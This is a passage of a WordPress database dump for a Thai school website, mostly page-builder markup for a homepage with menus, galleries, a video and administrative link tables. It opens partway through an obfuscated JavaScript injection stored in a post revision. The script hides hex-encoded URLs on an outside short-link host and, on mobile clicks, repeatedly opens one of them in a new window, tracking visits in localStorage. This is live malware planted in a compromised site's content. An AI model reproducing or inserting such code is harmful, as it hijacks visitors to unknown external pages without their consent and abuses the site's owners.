_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','จดหมายข่าวประชาสัมพันธ์','','inherit','closed','closed','','119-revision-v1','','','2024-07-29 18:49:57','2024-07-29 11:49:57','',119,'http://watprato.ssk.in.th/?p=121',0,'revision','',0),
(122,1,'2024-07-29 18:50:15','2024-07-29 11:50:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 